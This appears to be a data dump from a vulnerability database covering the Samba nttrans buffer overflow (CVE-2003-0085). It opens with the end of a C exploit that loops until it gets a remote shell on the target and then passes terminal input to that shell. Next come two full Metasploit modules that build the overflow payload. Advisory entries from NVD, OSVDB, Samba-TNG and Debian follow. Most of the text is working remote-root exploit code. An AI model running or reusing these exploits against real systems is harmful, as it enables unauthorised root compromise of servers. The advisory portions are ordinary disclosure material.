exit(-1);\r\n }\r\n if (port == -1) port = SMBD_PORT;\r\n\r\n signal(SIGINT, userbreak_handler);\r\n\r\n while (!userbreak)\r\n { memset(&s_in, 0, sizeof (s_in));\r\n s_in.sin_family = AF_INET;\r\n s_in.sin_port = htons(port);\r\n s_in.sin_addr.s_addr = target_ip;\r\n\r\n if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)\r\n { fprintf(stderr, \"socket() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n if (connect(fd, (struct sockaddr *)&s_in, sizeof (s_in)) == -1)\r\n { fprintf(stderr, \"connect() to host '%s:%i' failed, reason: '%s' (code\r\n%i)\\n\", host, port, strerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n // register name\r\n nbt_session_request(fd, \"BOSSA\", \"SAMBA\");\r\n process_nbt_session_reply(fd);\r\n\r\n // protocol negotiation\r\n negprot_request(fd);\r\n process_negprot_reply(fd);\r\n\r\n // session setup\r\n sesssetupx_request(fd);\r\n process_sesssetupx_reply(fd);\r\n\r\n // tree connection setup\r\n tconx_request(fd);\r\n process_tconx_reply(fd);\r\n\r\n // nttrans packet sturen\r\n nttrans_primary_request(fd);\r\n\r\n nttrans_secondary_request(fd);\r\n\r\n usleep(750000);\r\n\r\n if (close(fd) == -1)\r\n { fprintf(stderr, \"close() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n memset(&s_in, 0, sizeof (s_in));\r\n s_in.sin_family = AF_INET;\r\n s_in.sin_port = htons(SHELLCODE_PORT);\r\n s_in.sin_addr.s_addr = target_ip;\r\n\r\n if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)\r\n { fprintf(stderr, \"socket() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n if (connect(fd, (struct sockaddr *)&s_in, sizeof (s_in)) == -1)\r\n { if (close(fd) == -1)\r\n { fprintf(stderr, \"close() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n PARAMBASE += BRUTESTEP;\r\n continue;\r\n }\r\n\r\n printf(\"\\n\\n** veel plezier.\\n\\n\");\r\n\r\n FD_ZERO(&readfds);\r\n while (!userbreak)\r\n { FD_SET(fileno(stdin), &readfds);\r\n FD_SET(fd, &readfds);\r\n\r\n if (select(fd + 1, &readfds, NULL, NULL, NULL) < 0)\r\n { fprintf(stderr, \"shell loop aborted because of error code %i\r\n('%s')\\n\", errno, strerror(errno));\r\n break;\r\n }\r\n\r\n if (FD_ISSET(fileno(stdin), &readfds))\r\n { int writelen;\r\n\r\n readlen = read(fileno(stdin), readbuf, sizeof (readbuf));\r\n if (readlen == -1)\r\n { fprintf(stderr, \"read() failed with error code %i ('%s')\\n\", errno,\r\nstrerror(errno));\r\n exit(-1);\r\n }\r\n if ((writelen = write(fd, readbuf, readlen)) == -1)\r\n { fprintf(stderr, \"write() failed with error code %i ('%s')\\n\", errno,\r\nstrerror(errno));\r\n exit(-1);\r\n }\r\n FD_ZERO(&readfds);\r\n continue;\r\n }\r\n if (FD_ISSET(fd, &readfds))\r\n { if ((readlen = read(fd, readbuf, sizeof (readbuf))) == -1)\r\n { fprintf(stderr, \"shell loop aborted because of error code %i\r\n('%s')\\n\", errno, strerror(errno));\r\n break;\r\n }\r\n write(fileno(stderr), readbuf, readlen);\r\n FD_ZERO(&readfds);\r\n continue;\r\n }\r\n }\r\n\r\n }\r\n\r\n printf(\"user break.\\n\");\r\n signal(SIGINT, SIG_DFL);\r\n\r\n return 0;\r\n}", "osvdbidlist": ["6323"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:07:56", "bulletinFamily": "NVD", "description": "Buffer overflow in the SMB/CIFS packet fragment re-assembly code for SMB daemon (smbd) in Samba before 2.2.8, and Samba-TNG before 0.3.1, allows remote attackers to execute arbitrary code.", "modified": "2018-10-19T15:29:00", "id": "CVE-2003-0085", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0085", "published": "2003-03-31T05:00:00", "title": "CVE-2003-0085", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T23:35:56", "bulletinFamily": "exploit", "description": "Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow. CVE-2003-0085. Remote exploit for linux platform", "modified": "2010-04-28T00:00:00", "published": "2010-04-28T00:00:00", "id": "EDB-ID:16321", "href": "https://www.exploit-db.com/exploits/16321/", "type": "exploitdb", "title": "Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow", "sourceData": "##\r\n# $Id: nttrans.rb 9167 2010-04-28 03:54:24Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module attempts to exploit a buffer overflow vulnerability present in\r\n\t\t\t\tversions 2.2.2 through 2.2.6 of Samba.\r\n\r\n\t\t\t\tThe Samba developers report this as:\r\n\t\t\t\t\"Bug in the length checking for encrypted password change requests from clients.\"\r\n\r\n\t\t\t\tThe bug was discovered and reported by the Debian Samba Maintainers.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9167 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2003-0085' ],\r\n\t\t\t\t\t[ 'OSVDB', '6323' ],\r\n\t\t\t\t\t[ 'BID', '7106' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'MinNops' => 512,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ \"Samba 2.2.x Linux x86\",\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Rets' => [0x01020304, 0x41424344],\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 7 2003'\r\n\t\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(139)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# 0x081fc968\r\n\r\n\t\tpattern = Rex::Text.pattern_create(12000)\r\n\r\n\t\tpattern[532, 4] = [0x81b847c].pack('V')\r\n\t\tpattern[836, payload.encoded.length] = payload.encoded\r\n\r\n\t\t# 0x081b8138\r\n\r\n\t\tconnect\r\n\t\tsmb_login\r\n\r\n\t\ttarg_address = 0xfffbb7d0\r\n\r\n\t\t#\r\n\t\t# Send a NTTrans request with ParameterCountTotal set to the buffer length\r\n\t\t#\r\n\r\n\t\tsubcommand = 1\r\n\t\tparam = ''\r\n\t\tbody = ''\r\n\t\tsetup_count = 0\r\n\t\tsetup_data = ''\r\n\t\tdata = param + body\r\n\r\n\t\tpkt = CONST::SMB_NTTRANS_PKT.make_struct\r\n\t\tself.simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n\t\tbase_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n\t\tparam_offset = base_offset\r\n\t\tdata_offset = param_offset + param.length\r\n\r\n\t\tpkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT\r\n\t\tpkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n\t\tpkt['Payload']['SMB'].v['Flags2'] = 0x2001\r\n\t\tpkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count\r\n\r\n\t\tpkt['Payload'].v['ParamCountTotal'] =12000\r\n\t\tpkt['Payload'].v['DataCountTotal'] = body.length\r\n\t\tpkt['Payload'].v['ParamCountMax'] = 1024\r\n\t\tpkt['Payload'].v['DataCountMax'] = 65504\r\n\t\tpkt['Payload'].v['ParamCount'] = param.length\r\n\t\tpkt['Payload'].v['ParamOffset'] = param_offset\r\n\t\tpkt['Payload'].v['DataCount'] = body.length\r\n\t\tpkt['Payload'].v['DataOffset'] = data_offset\r\n\t\tpkt['Payload'].v['SetupCount'] = setup_count\r\n\t\tpkt['Payload'].v['SetupData'] = setup_data\r\n\t\tpkt['Payload'].v['Subcommand'] = subcommand\r\n\r\n\t\tpkt['Payload'].v['Payload'] = data\r\n\r\n\t\tself.simple.client.smb_send(pkt.to_s)\r\n\t\tack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)\r\n\r\n\t\t#\r\n\t\t# Send a NTTrans secondary request with the magic displacement\r\n\t\t#\r\n\r\n\t\tparam = pattern\r\n\t\tbody = ''\r\n\t\tdata = param + body\r\n\r\n\t\tpkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct\r\n\t\tself.simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n\t\tbase_offset = pkt.to_s.length - 4\r\n\t\tparam_offset = base_offset\r\n\t\tdata_offset = param_offset + param.length\r\n\r\n\t\tpkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY\r\n\t\tpkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n\t\tpkt['Payload']['SMB'].v['Flags2'] = 0x2001\r\n\t\tpkt['Payload']['SMB'].v['WordCount'] = 18\r\n\r\n\t\tpkt['Payload'].v['ParamCountTotal'] = param.length\r\n\t\tpkt['Payload'].v['DataCountTotal'] = body.length\r\n\t\tpkt['Payload'].v['ParamCount'] = param.length\r\n\t\tpkt['Payload'].v['ParamOffset'] = param_offset\r\n\t\tpkt['Payload'].v['ParamDisplace'] = targ_address\r\n\t\tpkt['Payload'].v['DataCount'] = body.length\r\n\t\tpkt['Payload'].v['DataOffset'] = data_offset\r\n\r\n\t\tpkt['Payload'].v['Payload'] = data\r\n\r\n\t\tself.simple.client.smb_send(pkt.to_s)\r\n\t\tack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)\r\n\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16321/"}, {"lastseen": "2016-02-01T11:34:14", "bulletinFamily": "exploit", "description": "Samba 2.2.x nttrans Overflow. CVE-2003-0085. Remote exploit for linux platform", "modified": "2003-04-07T00:00:00", "published": "2003-04-07T00:00:00", "id": "EDB-ID:9936", "href": "https://www.exploit-db.com/exploits/9936/", "type": "exploitdb", "title": "Samba 2.2.x - nttrans Overflow", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Samba nttrans Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2003-0085' ],\r\n\t\t\t\t\t[ 'OSVDB', '6323' ],\r\n\t\t\t\t\t[ 'BID', '7106' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'MinNops' => 512,\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[\"Samba 2.2.x Linux x86\", \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Rets' => [0x01020304, 0x41424344],\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 7 2003'\r\n\t\t\t))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(139)\r\n\t\t\t\t], self.class)\r\n\t\t\t\t\t\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t\r\n\t\t# 0x081fc968\r\n\t\t\r\n\t\tpattern = Rex::Text.pattern_create(12000)\r\n\t\r\n\t\tpattern[532, 4] = [0x81b847c].pack('V')\r\n\t\tpattern[836, payload.encoded.length] = payload.encoded\r\n\r\n\t#\t0x081b8138\r\n\r\n\r\n\t\tconnect\r\n\t\tsmb_login\r\n\r\n\t\ttarg_address = 0xfffbb7d0\t\r\n\t\t\r\n\t\t#\r\n\t\t# Send a NTTrans request with ParameterCountTotal set to the buffer length\r\n\t\t#\r\n\r\n\t\tsubcommand = 1\r\n\t\tparam = ''\r\n\t\tbody = ''\r\n\t\tsetup_count = 0\r\n\t\tsetup_data = ''\r\n\t\tdata = param + body\r\n\r\n\t\tpkt = CONST::SMB_NTTRANS_PKT.make_struct\r\n\t\tself.simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\t\t\r\n\t\tbase_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n\t\tparam_offset = base_offset\r\n\t\tdata_offset = param_offset + param.length\r\n\t\t\r\n\t\tpkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT\r\n\t\tpkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n\t\tpkt['Payload']['SMB'].v['Flags2'] = 0x2001\r\n\t\tpkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count\r\n\t\t\r\n\t\tpkt['Payload'].v['ParamCountTotal'] =12000\r\n\t\tpkt['Payload'].v['DataCountTotal'] = body.length\r\n\t\tpkt['Payload'].v['ParamCountMax'] = 1024\r\n\t\tpkt['Payload'].v['DataCountMax'] = 65504\r\n\t\tpkt['Payload'].v['ParamCount'] = param.length\r\n\t\tpkt['Payload'].v['ParamOffset'] = param_offset\r\n\t\tpkt['Payload'].v['DataCount'] = body.length\r\n\t\tpkt['Payload'].v['DataOffset'] = data_offset\r\n\t\tpkt['Payload'].v['SetupCount'] = setup_count\r\n\t\tpkt['Payload'].v['SetupData'] = setup_data\r\n\t\tpkt['Payload'].v['Subcommand'] = subcommand\r\n\t\t\t\t\r\n\t\tpkt['Payload'].v['Payload'] = data\r\n\t\t\r\n\t\tself.simple.client.smb_send(pkt.to_s)\r\n\t\tack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)\r\n\t\t\r\n\t\t#\r\n\t\t# Send a NTTrans secondary request with the magic displacement\r\n\t\t#\r\n\r\n\t\tparam = pattern\r\n\t\tbody = ''\r\n\t\tdata = param + body\r\n\r\n\t\tpkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct\r\n\t\tself.simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\t\t\r\n\t\tbase_offset = pkt.to_s.length - 4\r\n\t\tparam_offset = base_offset\r\n\t\tdata_offset = param_offset + param.length\r\n\t\t\r\n\t\tpkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY\r\n\t\tpkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n\t\tpkt['Payload']['SMB'].v['Flags2'] = 0x2001\r\n\t\tpkt['Payload']['SMB'].v['WordCount'] = 18\r\n\t\t\r\n\t\tpkt['Payload'].v['ParamCountTotal'] = param.length\r\n\t\tpkt['Payload'].v['DataCountTotal'] = body.length\r\n\t\tpkt['Payload'].v['ParamCount'] = param.length\r\n\t\tpkt['Payload'].v['ParamOffset'] = param_offset\r\n\t\tpkt['Payload'].v['ParamDisplace'] = targ_address\r\n\t\tpkt['Payload'].v['DataCount'] = body.length\r\n\t\tpkt['Payload'].v['DataOffset'] = data_offset\r\n\t\t\t\t\r\n\t\tpkt['Payload'].v['Payload'] = data\r\n\t\t\r\n\t\tself.simple.client.smb_send(pkt.to_s)\r\n\t\tack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)\r\n\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9936/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote buffer overflow exists in Samba. The service fails to check a field length inside of the request before using this length in a memcpy() operation, resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code to be executed with super-user privileges, resulting in a loss of confidentiality and integrity.\n## Solution Description\nUpgrade to version 2.2.7a or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote buffer overflow exists in Samba. The service fails to check a field length inside of the request before using this length in a memcpy() operation, resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code to be executed with super-user privileges, resulting in a loss of confidentiality and integrity.\n## References:\n[Secunia Advisory ID:8299](https://secuniaresearch.flexerasoftware.com/advisories/8299/)\nISS X-Force ID: 12749\nISS X-Force ID: 11550\nGeneric Exploit URL: http://www.securiteam.com/exploits/5TP0M2AAKS.html\n[CVE-2003-0085](https://vulners.com/cve/CVE-2003-0085)\nCERT VU: 298233\nBugtraq ID: 7106\n", "modified": "2003-07-27T12:00:00", "published": "2003-07-27T12:00:00", "href": "https://vulners.com/osvdb/OSVDB:6323", "id": "OSVDB:6323", "type": "osvdb", "title": "Samba Fragment Reassembly Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nRedHat RHSA: RHSA-2003:095\nISS X-Force ID: 11550\n[CVE-2003-0085](https://vulners.com/cve/CVE-2003-0085)\nCERT VU: 298233\nBugtraq ID: 7106\n", "modified": "2003-03-14T00:00:00", "published": "2003-03-14T00:00:00", "id": "OSVDB:11800", "href": "https://vulners.com/osvdb/OSVDB:11800", "title": "Samba smbd SMB/CIFS Packet Fragment Re-assembly Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:07", "bulletinFamily": "software", "description": "---------- Forwarded message ----------\r\nDate: Sat, 22 Mar 2003 21:03:11 +0100 &#40;CET&#41;\r\nFrom: Stephan Lauffer &lt;lauffer@ph-freiburg.de&gt;\r\nTo: tng-announcements@lists.dcerpc.org\r\nSubject: [ANNOUNCE] Samba-TNG 0.3.1 Security Release\r\n\r\n Samba-TNG-0.3.1 released\r\n==========================\r\nMar 22th 2003\r\n\r\nToday the Samba-TNG team announces a new version of Samba-TNG\r\nwith two serious security fixes. We STRONGLY recommend updating\r\nto this release.\r\n\r\n Changes to 0.3:\r\n------------------\r\n\r\nSamba-TNG-0.3.1 is a security and bugfixed version of 0.3\r\nonly.\r\n o Security fix of a hole found in Samba by S. Kramer\r\n of SuSE.\r\n o Security fix of a hole discovered by Elrond in the\r\n security context management of Samba-TNG.\r\n o Fix some minor bugs in the rpcclient.\r\n\r\n Security problem description:\r\n-------------------------------\r\n\r\nIn probably all versions of Samba-TNG prior to 0.3.1 there\r\nwere two remote root escalations discovered.\r\n\r\nThe first hole was discovered in the Samba package by\r\nSebastian Kramer from SuSE.\r\nCross references:\r\n MITRE CVE entry CAN-2003-0085\r\n http://us1.samba.org/samba/whatsnew/samba-2.2.8.html\r\nExploit code for Samba is known to be circulating; it is probably\r\nonly a matter of time until exploits are adapted for Samba-TNG.\r\nPeter Samuelson ported the fix from Samba to this release of\r\nSamba-TNG.\r\n\r\nThe second hole is a bug in the security context management code,\r\ndiscovered by Elrond from Samba-TNG. We believe that this bug does\r\nnot affect the classic Samba, since their implementation of this\r\nfunctionality is quite different.\r\n\r\nIf you can get any &#40;including anonymous&#41; connection to TNG,\r\nyou can become root on the target. Tcpwrappers &#40;a compile option\r\nin TNG&#41;, the smb.conf parameters &quot;allow host&quot; / &quot;deny host&quot;, or\r\nfirewalls may of course reduce your exposure.\r\n\r\nThis vulnerability was discovered and fixed internally; we do not\r\nbelieve there are any public exploits at this time.\r\n\r\nWe don&#39;t know of any workarounds for either of the two problems.\r\n\r\n Downloading Samba-TNG-0.3.1:\r\n------------------------------\r\n\r\nThe list of available binary packages will be found at the\r\ndonwload page: http://www.samba-tng.org/download.html\r\n\r\nSource via CVS see:\r\ncvs -d :pserver:anoncvs@anoncvs.dcerpc.org:/home/cvsroot login\r\nWhen it prompts for a password, use anoncvs\r\ncvs -z3 -d :pserver:anoncvs@anoncvs.dcerpc.org:/home/cvsroot co -r release-0-3-1 tng\r\n\r\nSource tarball:\r\n http://www.samba-tng.org/download/tng/samba-tng-0.3.1.tar.gz &#40;3082595 bytes&#41;\r\n MD5SUM: 35627e8cfa3453e83586a70a4e175ca4\r\n\r\nPatch file to update from 0.3:\r\n http://www.samba-tng.org/download/tng/samba-tng-0.3-0.3.1.diff.gz &#40;11399 bytes&#41;\r\n MD5SUM: ae55c7ee0ae4f86bb56f0ae5ae8e16a1\r\n\r\nWith regards,\r\nStephan", "modified": "2003-03-24T00:00:00", "published": "2003-03-24T00:00:00", "id": "SECURITYVULNS:DOC:4272", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4272", "title": "Samba-TNG 0.3.1 Security Release &#40;fwd&#41;", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:07", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-262-1 security@debian.org\r\nhttp://www.debian.org/security/ Wichert Akkerman\r\nMarch 15, 2003\r\n- ------------------------------------------------------------------------\r\n\r\n\r\nPackage : samba\r\nProblem type : remote exploit\r\nDebian-specific: no\r\nCVE ids : CAN-2003-0085 CAN-2003-0086\r\n\r\nSebastian Krahmer of the SuSE security audit team found two problems\r\nin samba, a popular SMB/CIFS implementation. The problems are:\r\n\r\n* a buffer overflow in the SMB/CIFS packet fragment re-assembly code\r\n used by smbd. Since smbd runs as root an attacker can use this to\r\n gain root access to a machine running smbd.\r\n\r\n* the code to write reg files was vulnerable for a chown race which made\r\n it possible for a local user to overwrite system files\r\n\r\nBoth problems have been fixed in upstream version 2.2.8, and version\r\n2.2.3a-12.1 of package for Debian GNU/Linux 3.0/woody.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\nObtaining updates:\r\n\r\n By hand:\r\n wget URL\r\n will fetch the file for you.\r\n dpkg -i FILENAME.deb\r\n will install the fetched file.\r\n\r\n With apt:\r\n deb http://security.debian.org/ stable/updates main\r\n added to /etc/apt/sources.list will provide security updates\r\n\r\nAdditional information can be found on the Debian security webpages\r\nat http://www.debian.org/security/\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n\r\nDebian GNU/Linux 2.2 alias potato\r\n- ---------------------------------\r\n\r\n No fixes for potato are available at this moment.\r\n\r\n\r\nDebian GNU/Linux 3.0 alias woody\r\n- --------------------------------\r\n\r\n Woody was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel,\r\n powerpc, s390 and sparc. Updated packages for m68k are not available\r\n at this moment.\r\n\r\n Source archives:\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1.dsc\r\n Size/MD5 checksum: 1417 f8ba1f1c191d72245498fe8517b34dfb\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a.orig.tar.gz\r\n Size/MD5 checksum: 5460531 b6ec2f076af69331535a82b586f55254\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1.diff.gz\r\n Size/MD5 checksum: 105954 c4f722541096dbdc492b3e37d532a457\r\n\r\n Architecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/samba-doc_2.2.3a-12.1_all.deb\r\n Size/MD5 checksum: 2446596 09b98f69fe6fa23543824c13c5ef98c5\r\n\r\n alpha architecture &#40;DEC Alpha&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 622740 53102afe9bc7357abaac9e6d163cff15\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 600148 cdb00b063309e1bc314c013a2ab7df9d\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 1131054 9cf909b0e8b1a71945addbdb0a5b4051\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 949532 3310dbdefcc1062ad3d940df6448d106\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 1106444 26f1822f7a466d546b8d131e244b9403\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 2955638 108a1e79c6e0f4d35d239fa0da5d2af2\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 415342 1e0d39fbdd1b4adabc4e83efc9652ade\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 489330 4cc41e31ca14bca6c627885bf4158306\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_alpha.deb\r\n Size/MD5 checksum: 1155752 96fc4d4fba8d5144eca524dab0d3f676\r\n\r\n arm architecture &#40;ARM&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 999684 e9a198658e31008f2029911fa8f3e6c6\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 829522 62dec09d61eacb27021e2bd7285a1485\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 555796 cf1ed859a65e3918290b046ebb94714e\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 460742 b76711eedb3c58557919017bef9b66f3\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 1021712 6274000513467291e4e2e636e49e3caa\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 546112 1e971721816bd8c5dfdc76e853adc81f\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 972556 2b2785914b1de3cd4f5b54a71aafa977\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 2541432 52be6e56a2870f7bbb88ed00fb4e6197\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_arm.deb\r\n Size/MD5 checksum: 396296 ba0077d84e96b8de2958a1a3d0b0c7ab\r\n\r\n hppa architecture &#40;HP PA RISC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 2790802 666ba6b6075a9c43d44cee7d66ed654d\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 589754 6d80091312fc5a721ab3216785fd8d73\r\n 